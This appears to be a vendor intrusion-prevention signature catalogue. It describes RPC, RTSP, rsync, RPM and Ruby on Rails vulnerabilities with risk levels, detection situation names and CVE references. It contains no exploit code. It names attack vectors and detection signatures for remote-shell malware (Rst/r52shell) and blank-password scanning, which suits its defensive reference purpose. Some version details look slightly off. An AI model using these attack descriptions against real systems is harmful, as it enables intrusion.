Last changed:

sgpkg-ips-1499-5242

Platform:

Generic

Software:

Roxy-WI

Type:

Input Validation

Description:

A vulnerability in Roxy-WI, versions before 6.1.1.0, which allows remote attackers to execute arbitrary code by sending a crafted request to the target /app/options.py, due to the insufficient input validation of the ipbackend variable.

Situation:

HTTP_CRL-Roxy-WI-Unauthenticated-Command-Injection-RCE

References:

CVE-2022-31137
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31137

RPC-BOF-MS03-049

About this vulnerability:

Windows RPC Service Buffer Overflow MS03-049

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP

Software:

RPC

Type:

Buffer Overflow

Description:

Microsoft Windows RPC Service contains a buffer overflow bug which can be triggered by sending a call to NetAddAlternateComputerName or NetValidateName (FAT only) with a large name argument. The buffer overflow allows the attacker to run code from a remote computer with system privileges.

Situation:

Generic_MSRPC-WKSSVC-MS03-049
MSRPC-TCP_CPS-Rpc445-MS03-049
Generic_CS-Rpc445-MS03-049

References:

CVE-2003-0812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0812

BID-9011
http://www.securityfocus.com/bid/9011

MS03-049
http://technet.microsoft.com/security/bulletin/MS03-049

RPC-CA-BrightStor-Arcserve-Backup-Caloggerd.exe-Null-Hostname-DOS

About this vulnerability:

Denial of service vulnerability in the Computer Associates BrightStor ARCserve Backup caloggerd process

Risk:

Moderate

First detected in:

sgpkg-ips-109-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops

Type:

Malfunction

Description:

There is a denial of service vulnerability in the Computer Associates BrightStor ARCserve Backup caloggerd process. A remote unauthenticated attacker can exploit this vulnerability by sending a malformed SUN RPC request that contains a specially crafted String Length field to the affected service, causing a denial of service.

Situation:

SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Caloggerd.exe-Null-Hostname-DOS

References:

CVE-2007-2772
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2772

BID-24017
http://www.securityfocus.com/bid/24017

OSVDB-35328
http://www.osvdb.org/35328

RPC-CA-BrightStor-Arcserve-Backup-Media-Server-Sun-RPC-Denial-Of-Service

About this vulnerability:

Denial of service vulnerability in Computer Associates BrightStor ARCserve Media Server

Risk:

Moderate

First detected in:

sgpkg-ips-106-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops

Type:

Malfunction

Description:

There is a denial of service vulnerability in Computer Associates BrightStor ARCserve Media Server. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted SUN RPC request to the affected service, causing a denial of service.

Situation:

SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Media-Server-Sun-RPC-Denial-Of-Service

References:

CVE-2007-2139
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2139

BID-23635
http://www.securityfocus.com/bid/23635

OSVDB-34127
http://www.osvdb.org/34127

RPC-CA-BrightStor-Arcserve-Backup-Media-Server-Sun-RPC-Service-BOF

About this vulnerability:

Buffer overflow vulnerability in Computer Associates BrightStor ARCserve Media Server

Risk:

High

First detected in:

sgpkg-ips-106-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Computer Associates BrightStor ARCserve Backup for Laptops and Desktops

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Computer Associates BrightStor ARCserve Media Server. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted SUN RPC request to the affected service, causing a denial of service or compromising the vulnerable system.

Situation:

SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Media-Server-Sun-RPC-Service-BOF

References:

CVE-2007-2139
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2139

BID-23635
http://www.securityfocus.com/bid/23635

OSVDB-34127
http://www.osvdb.org/34127

RPC-Cde-Dtspcd-Buffer-Overflow

About this vulnerability:

Buffer overflow in CDE

Risk:

Critical

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Open Group CDE

Type:

Buffer Overflow

Description:

Command Desktop Environment (CDE), shipped by many Unix vendors, contains a buffer overflow vulnerability that can be exploited to execute arbitrary commands on the target host with root privileges.

Situation:

Generic_RPC-Cde-Dtspcd-Buffer-Overflow

References:

CVE-2001-0803
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0803

BID-3517
http://www.securityfocus.com/bid/3517

RPC-CMSD-CREATE-Buffer-Overflow-Vulnerability

About this vulnerability:

Buffer overflow in rpc.cmsd.

Risk:

Critical

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

rpc.cmsd

Type:

Buffer Overflow

Description:

A buffer-overflow condition exists in rpc.cmsd provided by multiple vendors; by exploiting the vulnerability an attacker is able to remotely gain root access to the target.

Situation:

Generic_SunRPC-CMSD-CREATE-Buffer-Overflow

References:

CVE-1999-0696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0696

BID-524
http://www.securityfocus.com/bid/524

RPC-EMC-Legato-NetWorker-Remote-Exec-Service-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in EMC legato NetWorker

Risk:

High

First detected in:

sgpkg-ips-120-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC Legato NetWorker

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in EMC legato NetWorker. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted RPC message to the vulnerable server, to cause a denial of service condition or execute arbitrary code.

Situation:

SunRPC_TCP-EMC-Legato-NetWorker-Remote-Exec-Service-Buffer-Overflow

References:

CVE-2007-3618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3618

BID-25375
http://www.securityfocus.com/bid/25375

OSVDB-39744
http://www.osvdb.org/39744

RPC-Linux-Nfs_Mountd-Buffer-Overflow

About this vulnerability:

Buffer overflow in nfs daemon.

Risk:

Critical

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

rpc.mountd

Type:

Buffer Overflow

Description:

A buffer overflow condition in rpc.mountd can be exploited to execute arbitrary command on the target host with superuser privileges, even if the nfs server doesn't share anything.

Situation:

Generic_RPC-Linux-Nfs-Mountd-Buffer-Overflow

References:

CVE-1999-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0002

BID-121
http://www.securityfocus.com/bid/121

RPC-MIT-Kerberos-Kadmind-RPC-Library-Unix-Authentication-Buffer-Overflow

About this vulnerability:

Buffer overflow in Kerberos Kadmind authentication library

Risk:

High

First detected in:

sgpkg-ips-113-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos

Type:

Buffer Overflow

Description:

There is a remote exploitable buffer overflow vulnerability in the MIT Kerberos Kadmind RPC Library. The vulnerability can be exploited to gain a remote administrative access.

Situation:

SunRPC_TCP-Kerberos-Kadmind-BOF

References:

CVE-2007-2443
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2443

BID-24657
http://www.securityfocus.com/bid/24657

OSVDB-36597
http://www.osvdb.org/36597

RPC-Portmapper-Access

About this vulnerability:	Access to portmapper
Risk:	Moderate
First detected in:	sgpkg-ips-86-1314
Last changed:	sgpkg-ips-1296-5242
Platform:	Unix
Software:	<os>
Type:	Insecure Configuration
Description:	Many RPC services are known to have security problems. Using portmapper, it is possible to query which RPC services are available on a host. This information as can reveal to an attacker whether there are any exploitable RPC services available.
Situation:	Generic_UDP-SunRPC-Portmapper-Dump-Query Generic_UDP-SunRPC-Portmapper-GetPort-Query Generic_RPC-Nfs-Export-Query SunRPC_RPC-Portmapper-Dump-Query SunRPC_Nfs-Export-Query SunRPC_Portmap-GetPort-Query

RPC-sadmind-ADM-Method-BOF

About this vulnerability:

Buffer overflow in Solstice AdminSuite's sadmind

Risk:

High

First detected in:

sgpkg-ips-181-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris 8; Solaris 9

Software:

RPC

Type:

Buffer Overflow

Description:

There exists a stack buffer overflow vulnerability in Solstice AdminSuite's sadmind. The flaw is due to improper user input validation when processing RPC requests. A remote unauthenticated attacker can leverage this vulnerability by sending crafted RPC message to the target host, potentially inject and execute arbitrary code with root level privileges.

Situation:

Generic_RPC-sadmind-ADM-Method-Buffer-Overflow

References:

CVE-2008-4556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4556

BID-31751
http://www.securityfocus.com/bid/31751

OSVDB-50019
http://www.osvdb.org/50019

RPC-sadmind-BOF

About this vulnerability:

Buffer overflow in sadmind

Risk:

Critical

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Sun Solaris 2.6; Solaris 7

Software:

RPC

Type:

Buffer Overflow

Description:

Daemon sadmind, which is shipped with certain versions of Solaris, contains a buffer overflow condition which can be exploited to remotely gain root access to the target.

Situation:

Generic_RPC-sadmind-NETMGT-PROC-Service-Buffer-Overflow

References:

CVE-1999-0977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0977

BID-866
http://www.securityfocus.com/bid/866

OSVDB-2558
http://www.osvdb.org/2558

RPC-Status-GHBN-Format-String-Vulnerability

About this vulnerability:

Buffer overflow in rpc.statd

Risk:

Critical

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

nfs-utils

Type:

Format String

Description:

A malicious user can exploit the logging functionality of the rpc.statd server to executable arbitrary code in the target system with root privileges.

Situation:

Generic_RPC-Status-GHBN-Format-String
SunRPC_TCP-Nfs-Statd-Format-String

References:

CVE-2000-0666
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0666

BID-1480
http://www.securityfocus.com/bid/1480

RPC-ToolTalk-Access

About this vulnerability:	Access to ToolTalk
Risk:	High
First detected in:	sgpkg-ips-86-1314
Last changed:	sgpkg-ips-1296-5242
Platform:	Unix
Software:	<os>
Type:	Insecure Configuration
Description:	ToolTalk is an RPC-based messaging protocol. It is used in various Unix operating systems. While ToolTalk is not often used over a network, it is remotely accessible by default, and it has a long history of remote security vulnerabilities. Unless access to ToolTalk is specifically required, it is recommended to prevent remote access to ToolTalk.
Situation:	SunRPC_TCP-ToolTalk-Access

RPC-ToolTalk-Buffer-Overflow

About this vulnerability:

RPC tooltalk buffer overflow

Risk:

High

First detected in:

sgpkg-ips-86-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

<os>

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in the tooltalk service. Tooltalk is an rpc server and is part of the CDE desktop environment. The vulnerability can be remotely exploited and a successful exploit leads elevated remote system compromise. The exploitation of this vulnerability is easy as working attack tools are generally available.

Situation:

SunRPC_TCP-ToolTalk-Buffer-Overflow

References:

CVE-1999-0003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0003

BID-122
http://www.securityfocus.com/bid/122

OSVDB-4505
http://www.osvdb.org/4505

RPC-Ttdbserver-Format-String-Vulnerability

About this vulnerability:

Format string vulnerability in rpc.ttdbserverd

Risk:

Critical

First detected in:

sgpkg-ips-86-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

CDE

Type:

Format String

Description:

ToolTalk database server, shipped with CDE by multiple vendors, contains a format string vulnerability which can be exploited by an attacker to execute arbitrary commands on the target host.

Situation:

SunRPC_TCP-ToolTalk-Format-String

References:

CVE-2001-0717
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0717

BID-3382
http://www.securityfocus.com/bid/3382

RPC-Xdr-Array-Buffer-Overflow

About this vulnerability:

Buffer overflow in various xdr implementations

Risk:

Critical

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

rpc.cmsd; rpc.ttdbserverd

Type:

Buffer Overflow

Description:

Varous XDR implementations (SunRPC, libnsl, libc, glibc, etc..) are vulnerable to a buffer overflow condition, which can be exploited by an attacker to cause denial of service or to execute arbitrary commands on the system.

Situation:

Generic_RPC-Xdr-Array-Buffer-Overflow-1
SunRPC_TCP-Xdr-Array-Buffer-Overflow-2

References:

CVE-2002-0391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0391

BID-5356
http://www.securityfocus.com/bid/5356

MS02-057
http://technet.microsoft.com/security/bulletin/MS02-057

RPC-Yppasswd-Username-BOF

About this vulnerability:

Username overflow in rpc.yppasswd

Risk:

High

First detected in:

sgpkg-ips-2-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

rpc.yppasswd

Type:

Buffer Overflow

Description:

The yppasswd command that allows users to change their NIS password has a buffer-overflow vulnerability, which can allow remote attackers to gain root privileges.

Situation:

SunRPC_TCP-Yppasswd-Username-BOF

References:

CVE-2001-0779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0779

BID-2763
http://www.securityfocus.com/bid/2763

RPC-Ypupdated-Arbitrary-Command-Execution

About this vulnerability:

Arbitrary command execution in rpc.ypupdated

Risk:

Critical

First detected in:

sgpkg-ips-155-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

rpc.ypupdated

Type:

Metacharacter Injection

Description:

A command injection vulnerability in rpc.ypupdated, shipped by multiple vendors, allows an attacker to execute arbitrary commands with root privileges by injecting shell metacharacters to a crafted MAP UPDATE RPC request.

Situation:

Generic_CS-RPC-Ypupdated-Arbitrary-Command-Execution
Generic_UDP-RPC-Ypupdated-Arbitrary-Command-Execution

References:

CVE-1999-0208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0208

BID-28383
http://www.securityfocus.com/bid/28383

Rpcbind-Xdr-Parsing-Memory-Exhaustion-Denial-Of-Service

About this vulnerability:

A vulnerability in Rpcbind libtirpc

Risk:

Moderate

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RPC

Type:

Resource Starvation

Description:

Improper parsing of rpc requests in rpcbind and libtirpc can cause an unbounded memory leak. A successful exploit allows a remote attacker to cause a denial of service condition on the target system.

Situation:

Generic_UDP-Rpcbind-Xdr-Parsing-Memory-Exhaustion-Denial-Of-Service

References:

CVE-2017-8779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8779

Rpm-Package-Manager-Cpio-Header-Namesize-Integer-Overflow

About this vulnerability:

A vulnerability in Red Hat RPM Package Manager

Risk:

High

First detected in:

sgpkg-ips-629-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Red Hat RPM Package Manager

Type:

Integer Overflow

Description:

A code execution vulnerability exists in RPM package manager. The vulnerability is due to an integer overflow when parsing the CPIO header in the payload section of an RPM file, leading to a stack buffer overflow. A remote attacker can exploit this vulnerability by enticing a user to install a maliciously modified signed RPM package. Successful exploitation could lead to arbitrary code execution.

Situation:

File-Binary_Rpm-Package-Manager-Cpio-Header-Namesize-Integer-Overflow

References:

CVE-2014-8118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8118

BID-71588
http://www.securityfocus.com/bid/71588

OSVDB-115602
http://www.osvdb.org/115602

RSA-Authentication-Web-Agent-Request

About this vulnerability:	Detects the usage of RSA Security RSA Authentication Agent For Web for IIS
Risk:	Low
First detected in:	sgpkg-ips-493-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	RSA Security RSA Authentication for Web for IIS
Type:	Malfunction
Description:	This fingerprint detects web requests made for RSA Authentication IIS Web Agent.
Situation:	HTTP_CSU-RSA-Authentication-Web-Agent-Request

RSH-Authentication-Scanner-Vulnerability

About this vulnerability:

An RSH Authentication Scanner vulnerability.

Risk:

High

First detected in:

sgpkg-ips-739-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

rsh

Type:

Insecure Configuration

Description:

An rsh shell service test which locates Unix accounts that have a default, null, blank, or missing password.

Situation:

Generic_CS-RSH-Authentication-Scanner-Vulnerability

References:

CVE-1999-0651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0651

Rst-Malware

About this vulnerability:	Rst malware
Risk:	High
First detected in:	sgpkg-ips-367-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Unix
Software:	Any Software
Type:	Post Compromise Behaviour
Description:	Rst, also known as r52shell, is a remote control program written in PHP scripting language. It is often installed to compromised Linux systems.
Situation:	HTTP_SS-Rst-Malware File-Text_Rst-Malware

RSYNC-Backup-Dir-Directory-Traversal

About this vulnerability:

Insecurely configured rsyncd allows file import

Risk:

High

First detected in:

sgpkg-ips-418-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

rsync

Type:

Directory Traversal

Description:

If rsync daemon is installed with read/write enabled and without chroot option, an attacker can remotely write files outside of the configured path.

Situation:

Generic_CS-RSYNC-Arbitrary-File-Overwriting

References:

CVE-2004-0426
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0426

BID-10247
http://www.securityfocus.com/bid/10247

Rsync-Receive_Xattr-Heap-Based-Buffer-Overread

About this vulnerability:

A vulnerability in rsync Project rsync

Risk:

Moderate

First detected in:

sgpkg-ips-1023-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

rsync

Type:

Malfunction

Description:

Improper parsing of non-null-terminated strings in rsync causes a buffer overread vulnerability. A successful exploit can cause a denial of service condition on the target.

Situation:

Generic_CS-Rsync-Receive_Xattr-Heap-Based-Buffer-Overread

References:

CVE-2017-16548
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16548

Rsyslog-Pri-Value-Parsing-Integer-Overflow-Denial-Of-Service

About this vulnerability:

A vulnerability in Infodrom Oldenburg sysklogd

Risk:

Moderate

First detected in:

sgpkg-ips-619-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

rsyslog

Type:

Integer Overflow

Description:

A denial of service vulnerability exists in rsyslog and sysklogd. The vulnerability is due to an integer overflow when handling PRI values larger than MAX_INT in log messages. This issue is due to an incomplete fix for CVE-2014-3634. A remote, unauthenticated attacker can exploit these vulnerabilities by sending crafted packets to an affected service. Successful exploitation could result in a denial of service condition.

Situation:

Generic_CS-Rsyslog-Pri-Value-Parsing-Integer-Overflow-Denial-Of-Service
Generic_UDP-Rsyslog-Pri-Value-Parsing-Integer-Overflow-Denial-Of-Service

References:

CVE-2014-3683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3683

OSVDB-112596
http://www.osvdb.org/112596

RTF-File-Listid-Use-After-Free-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Word

Risk:

Moderate

First detected in:

sgpkg-ips-484-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Word

Type:

Malfunction

Description:

A vulnerability in Microsoft Word may allow code execution

Situation:

File-RTF_RTF-File-Listid-Use-After-Free-Vulnerability

References:

CVE-2012-2528
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2528

BID-55781
http://www.securityfocus.com/bid/55781

MS12-064
http://technet.microsoft.com/security/bulletin/MS12-064

RTSP-Describe-Request-Long-URI-Header

About this vulnerability:	Very Long URI Header detected in RTSP-request
Risk:	Low
First detected in:	sgpkg-ips-503-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Any Software
Type:	Malfunction
Description:	A suspiciously long URI was detected in an RTSP DESCRIBE request method. This may suggest a buffer overflow attempt, such as CVE-2002-1643.
Situation:	Generic_CS-RTSP-Describe-Request-Long-URI-Header

RTSP-Protocol-Usage

About this vulnerability:	RTSP (Real-Time Streaming Protocol) usage
Risk:	Moderate
First detected in:	sgpkg-ips-47-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Streaming Media
Description:	RTSP, Real-Time Streaming Protocol, is used to broadcast audio and video streams over IP networks.
Situation:	Shared_RTSP-Protocol-Usage

RTSP-RealNetworks-Helix-DNA-Server-Require-Header-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in RealNetworks Helix DNA servers request handling code

Risk:

Moderate

First detected in:

sgpkg-ips-119-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealNetworks Helix DNA Server

Type:

Buffer Overflow

Description:

RealNetworks Helix DNA Server does not parse RTSP requests correctly. An RTSP request containing multiple Request header fields can cause memory corruption, and possibly allow arbitrary code execution on the server.

Situation:

Generic_RTSP-RealNetworks-Helix-DNA-Server-Require-Header-Buffer-Overflow

References:

CVE-2007-4561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4561

BID-25440
http://www.securityfocus.com/bid/25440

RTSP-RealNetworks-Helix-Server-Describe-Request-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in RealNetworks Helix Server

Risk:

High

First detected in:

sgpkg-ips-106-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

RealNetworks Helix Universal Server

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in RealNetworks Helix Server. By sending an RTSP DESCRIBE request with a crafted LoadTestPassword header value to the vulnerable RealNetworks Helix Server RTSP service, a remote attacker can cause a denial of service or execute arbitrary code on the target host.

Situation:

Generic_UDP-RealNetworks-Helix-Server-Describe-Request-Buffer-Overflow
Generic_RealNetworks-Helix-Server-Describe-Request-Buffer-Overflow

References:

CVE-2006-6026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6026

BID-21141
http://www.securityfocus.com/bid/21141

Ruby-On-Rails-Action-View-Mime-DOS

About this vulnerability:

A Ruby On Rails Action View Mime DOS vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-744-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ruby on Rails

Type:

Input Validation

Description:

A vulnerability in Ruby on Rails, versions 3.x before 3.2.16 and 4.x before 4.0.2, which allows remote attackers to cause a denial of service condition by sending a header containing an long MIME type.

Situation:

HTTP_CSH-Very-Long-Accept-Header

References:

CVE-2013-6414
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6414

BID-64074
http://www.securityfocus.com/bid/64074

OSVDB-100525
http://www.osvdb.org/100525

Ruby-On-Rails-Activestorage-Insecure-Deserialization

About this vulnerability:

A vulnerability in Ruby on Rails

Risk:

Moderate

First detected in:

sgpkg-ips-1163-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ruby on Rails

Type:

Input Validation

Description:

There has been reported an insecure deserialization vulnerability in Ruby on Rails. This vulnerability could be exploited remotely by an unauthenticated attacker. Succesful exploitation might lead in arbitrary code execution.

Situation:

HTTP_CRL-Ruby-On-Rails-Activestorage-Insecure-Deserialization

References:

CVE-2019-5420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5420

Ruby-On-Rails-Devise-Password-Reset

About this vulnerability:

A Ruby On Rails Devise Password Reset vulnerability.

Risk:

High

First detected in:

sgpkg-ips-702-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ruby on Rails

Type:

Insecure Configuration

Description:

A vulnerability in the Ruby On Rails Devise gem, versions before 2.2.3, before 2.1.3, before 2.0.5, before 1.5.4, allow remote attackers to bypass security checks and reset passwords to arbitrary accounts due to improper type conversion when performing database queries.

Situation:

HTTP_CS-Ruby-On-Rails-Devise-Password-Reset

References:

CVE-2013-0233
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0233

BID-57577
http://www.securityfocus.com/bid/57577

OSVDB-89642
http://www.osvdb.org/89642

Ruby-On-Rails-Directory-Traversal-CVE-2014-0130

About this vulnerability:

A vulnerability in Ruby On Rails

Risk:

High

First detected in:

sgpkg-ips-1668-5242

Last changed:

sgpkg-ips-1668-5242

Platform:

Generic

Software:

Ruby on Rails

Type:

Input Validation

Description:

A directory traversal vulnerability in Ruby on Rails may allow unauthenticated attackers to read arbitrary files on the target server.

Situation:

HTTP_CSU-Multiple-Directory-Traversal-Vulnerabilities

References:

CVE-2014-0130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0130

Ruby-On-Rails-Dynamic-Render-File-Upload-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a Ruby on Rails Dynamic Render File Upload Remote Code Execution vulnerability detected

Risk:

High

First detected in:

sgpkg-ips-975-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ruby on Rails

Type:

Code Injection

Description:

A vulnerability in Ruby on Rails, multiple versions, which allows remote attackers to execute remote code via local file inclusion.

Situation:

HTTP_CRL-Ruby-On-Rails-Dynamic-Render-File-Upload-Remote-Code-Execution

References:

CVE-2016-0752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0752

Ruby-On-Rails-File-Content-Disclosure

About this vulnerability:

A vulnerability in Ruby On Rails

Risk:

High

First detected in:

sgpkg-ips-1145-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ruby on Rails

Type:

Malfunction

Description:

There is a file content disclosure vulnerability in Ruby On Rails. Successful exploitation of this vulnerability could lead in file content disclosure.

Situation:

HTTP_CRH-Ruby-On-Rails-File-Content-Disclosure

References:

CVE-2019-5418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5418

Ruby-On-Rails-JSON-Parse-Heap-Based-Buffer-Overflow

About this vulnerability:

A Ruby On Rails JSON Parse Heap Based Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-700-5211

Last changed:

sgpkg-ips-1720-5242

Platform:

Generic

Software:

Ruby on Rails

Type:

Malfunction

Description:

A vulnerability in Ruby On Rails, versions 1.8, 1.9 before 1.9.3-p484, 2.0 before 2.0.0-p353, 2.1 before 2.1.0 preview2, which allows remote attackers to cause a denial of service condition or execute arbitrary code via a string that is converted to a floating point value using the to_f method or JSON.parse.

Situation:

File-Text_Ruby-On-Rails-JSON-Parse-Heap-Based-Buffer-Overflow

References:

CVE-2013-4164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4164

OSVDB-100113
http://www.osvdb.org/100113

Ruby-On-Rails-JSON-Processor-YAML-Deserialization-Code-Execution

About this vulnerability:

A vulnerability in Ruby on Rails JSON Processor YAML deserialization

Risk:

High

First detected in:

sgpkg-ips-508-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ruby on Rails

Type:

Code Injection

Description:

There is a vulnerability in the JSON code for Ruby on Rails which allows attackers to bypass authentication systems, inject arbitrary SQL, inject and execute arbitrary code, or perform a DoS attack on a Rails application.

Situation:

HTTP_CS-Ruby-On-Rails-JSON-Processor-YAML-Deserialization-Code-Execution

References:

CVE-2013-0333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0333

BID-57575
http://www.securityfocus.com/bid/57575

OSVDB-89594
http://www.osvdb.org/89594

Ruby-On-Rails-Secret_Key_Base-Vulnerability

About this vulnerability:

A vulnerability in Ruby on Rails

Risk:

High

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ruby on Rails

Type:

Input Validation

Description:

A vulnerability in Ruby on Rails, versions 5.2 and before, which allows remote attackers to execute arbitrary code due to insecure authentication and user input validation.

Situation:

HTTP_CRL-Ruby-On-Rails-Secret_Key_Base-Vulnerability

References:

CVE-2019-5420
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5420

Ruby-On-Rails-Where-Hash-SQL-Injection

About this vulnerability:

A vulnerability in The Ruby on Rails Project Ruby on Rails

Risk:

Moderate

First detected in:

sgpkg-ips-460-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ruby on Rails

Type:

Input Validation

Description:

A vulnerability has been discovered in Ruby on Rails. The vulnerability is due to an improper input validation error while handling hash values. A remote attacker could exploit this vulnerability by sending malicious SQL code as part of the vulnerable parameter via a specially crafted URL, possibly leading to manipulation of data in the database or information disclosure.

Situation:

HTTP_CRL-Ruby-On-Rails-Where-Hash-SQL-Injection

References:

CVE-2012-2695
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2695

OSVDB-82403
http://www.osvdb.org/82403

Ruby-On-Rails-XML-Parameter-Parsing-Vulnerability

About this vulnerability:

A vulnerability in Ruby on Rails XML-parameter parsing

Risk:

High

First detected in:

sgpkg-ips-503-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ruby on Rails

Type:

Code Injection

Description:

An object-injection vulnerability exists in most web applications developed using Ruby on Rails framework versions lower than 4.0. By forging a malicious POST-request, an attacker can inject malicious code in an unpatched target system.

Situation:

HTTP_CS-Ruby-On-Rails-XML-Parameter-Parsing-Vulnerability

References:

CVE-2013-0156
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0156

BID-57187
http://www.securityfocus.com/bid/57187

OSVDB-89026
http://www.osvdb.org/89026

Ruby-Saml-Authentication-Bypass-CVE-2024-45409

About this vulnerability:

An attempt to exploit a vulnerability in ruby-saml detected

Risk:

High

First detected in:

sgpkg-ips-1850-5242

Last changed:

sgpkg-ips-1850-5242

Platform:

Generic

Software:

ruby-saml

Type:

Input Validation

Description:

The Ruby SAML library is for implementing the client side of a SAML authorization. Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response. An unauthenticated attacker with access to any signed saml document (by the IdP) can thus forge a SAML Response/Assertion with arbitrary contents. This would allow the attacker to log in as arbitrary user within the vulnerable system. This vulnerability is fixed in 1.17.0 and 1.12.3.

Situation:

References:

CVE-2024-45409
